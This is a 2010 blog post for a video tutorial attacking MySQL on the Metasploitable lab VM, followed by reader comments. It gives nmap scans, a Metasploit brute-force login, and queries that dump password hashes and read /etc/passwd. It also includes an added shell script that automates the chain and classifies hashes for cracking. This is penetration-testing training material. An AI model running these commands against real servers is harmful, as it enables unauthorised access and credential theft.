2010-07-01

[Video] Metasploitable - MySQL

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826084
Download video: http://www.mediafire.com/?cyz2gr42p49rkzm
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw



What is this?
This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> Use the MySQL client to send queries to the database with the recovered credentials (dumping password hashes and reading files from disk)


What do I need?

> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> MySQL client --- on Backtrack 4 (Final)
> Dictionaries/Word-lists --- usernames.lst and passwords.lst (links above)
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)


Commands:
nmap 192.168.1.1-255                      # sweep the /24 for live hosts
nmap -sS -sV -O -f -n 192.168.1.105       # SYN scan, service versions, OS guess, fragmented packets, no DNS
msfconsole
search mysql
use scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit                                   # "run" does the same for auxiliary modules
mysql -h 192.168.1.105 -u root -p         # -p with no value prompts for the password
root                                      # the password the brute force found
show databases;
use mysql
show tables;
select User, Password from user;          # password hashes for every MySQL account
select load_file('/etc/passwd');          # NULL means the account lacks FILE privilege or the server cannot read the path
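To make the run above repeatable, here is a small shell script, added here and not code from g0tmi1k's post or from the Metasploit project, that wraps the same steps: pick the host with 3306/tcp open out of nmap's grepable output, write the mysql_login options to an msfconsole resource script, emit the post-login queries (with a File_priv check in front of load_file(), since a NULL result, as in the comments below, usually means the account lacks the FILE privilege), and classify the dumped hashes so the right cracker mode can be picked. The target address, wordlist paths, the nmap output and the sample hash are assumptions or constructed lab data; only run_bruteforce and run_queries call the real tools.

```sh
#!/bin/sh
# Added example (not from the original post): shell helpers around the steps
# typed interactively in the video. TARGET, the wordlist paths and all sample
# data are assumptions/constructed; run_bruteforce and run_queries need
# nmap-found credentials plus msfconsole and the mysql client installed.
set -u

TARGET="${TARGET:-192.168.1.105}"
USER_FILE="${USER_FILE:-/root/usernames.lst}"
PASS_FILE="${PASS_FILE:-/root/passwords.lst}"

# Constructed stand-in for "nmap -sS -sV -oG - 192.168.1.1-255" output;
# only the second host exposes MySQL.
SAMPLE_NMAP_OG="$(cat <<'EOF'
Host: 192.168.1.1 ()  Ports: 80/open/tcp//http//router httpd/
Host: 192.168.1.105 ()  Ports: 22/open/tcp//ssh//OpenSSH 4.7p1/, 3306/open/tcp//mysql//MySQL 5.0.51a-3ubuntu5/
EOF
)"

# Steps 1-2: from grepable nmap output on stdin, print hosts with 3306/tcp open.
hosts_with_mysql() {
    awk '/^Host:/ && /3306\/open\/tcp/ { print $2 }'
}

# Step 3: write an msfconsole resource script carrying the same module and
# options as the video, so the brute force runs unattended (msfconsole -q -r FILE).
write_msf_rc() {
    out="$1"
    cat > "$out" <<EOF
use auxiliary/scanner/mysql/mysql_login
set RHOSTS $TARGET
set USER_FILE $USER_FILE
set PASS_FILE $PASS_FILE
run
exit
EOF
}

# Step 4: queries fed to the mysql client once a login works. File_priv is
# checked before load_file(), because load_file() returns NULL rather than an
# error when the account lacks FILE or the server cannot read the path.
post_login_sql() {
    cat <<'EOF'
SELECT User, Host, Password FROM mysql.user;
SELECT File_priv FROM mysql.user WHERE CONCAT(User, '@', Host) = CURRENT_USER();
SELECT load_file('/etc/passwd');
EOF
}

# Classify a Password column value: '*' + 40 hex chars is the MySQL 4.1+
# double-SHA1 hash (john --format=mysql-sha1), 16 hex chars is the pre-4.1
# hash (john --format=mysql), an empty string is a blank password.
mysql_hash_type() {
    if [ -z "$1" ]; then
        echo empty
    elif printf '%s\n' "$1" | grep -Eq '^\*[0-9A-Fa-f]{40}$'; then
        echo mysql-sha1
    elif printf '%s\n' "$1" | grep -Eq '^[0-9A-Fa-f]{16}$'; then
        echo mysql-old
    else
        echo unknown
    fi
}

# The only functions that call real tools.
run_bruteforce() {
    write_msf_rc /tmp/mysql_login.rc
    msfconsole -q -r /tmp/mysql_login.rc
}
# Usage: run_queries USER PASS  (the pair mysql_login reports, root:root on the stock image)
run_queries() {
    post_login_sql | mysql -h "$TARGET" -u "$1" -p"$2" --batch
}

# Offline demo on the constructed data.
printf '%s\n' "$SAMPLE_NMAP_OG" | hosts_with_mysql
mysql_hash_type '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B'   # constructed 4.1+-style hash
```

Run it as-is to exercise the parsing on the sample data; source it and call run_bruteforce, then run_queries with the credentials mysql_login reports, against the lab VM.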

Notes:

Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor
Video length: 3:24
Capture length: 9:14

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-mysql.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30076-%5Bvideo%5D-metasploitable-mysql.html#post167040



~g0tmi1k

10 comments:

  1. how do you know if a website uses mysql?
  2. @p0rr0n
    In the video, at 00:35 - you can see an open mysql port... (this was discovered by doing an nmap scan)
    Again in the video, at 01:15 - it shows this in more detail... (also by using nmap)
  3. @p0rr0n
    I had to delete your last comment, due to it not being legal.

  4. When I run the last command it shows a box like below, and I typed the command like you did. My passwd file has near identical information to yours.

    Any ideas? I'm running BT4 R2

    +--------------------------+
    | load_file('/etc/passwd') |
    +--------------------------+
    | NULL                     |
    +--------------------------+
    1 row in set (0.00 sec)
  5. @Krptodr
    Are you targeting metasploitable?
    My first guess is that the user you exploit doesn't have access to the file, hence it's returning NULL - which is why I ask about metasploitable...
  6. That makes sense, I don't know if I am targeting Metasploitable, I used the commands you have provided. In which case you are using metasploitable -- if I'm not mistaken.
  7. @Krptodr
    You would know if you're targeting metasploitable as you would have to set it up yourself! (Either by running it on another PC or in a VM)...

    You're not mistaken, the tutorial is on metasploitable...
  8. Ok correct, I have targeted metasploitable. But for some reason I can not get it to import my files. I will test it again and see if maybe I missed a step. I don't see how I would have because I was able to get to the end :)
  9. This comment has been removed by a blog administrator.

  10. @Krptodr
    Check the MD5 of your copy of metasploitable - see if it matches up with what it says on the site.
    It seems like an odd issue to me!


    @Ilies
    I've removed your comment - simply because it's off topic. If you're wanting general help with metasploit - you can try asking for help either on their IRC channel or mailing list.

    This is a post regarding "attacking metasploitable", using linux - not how to hack a web site using windows.
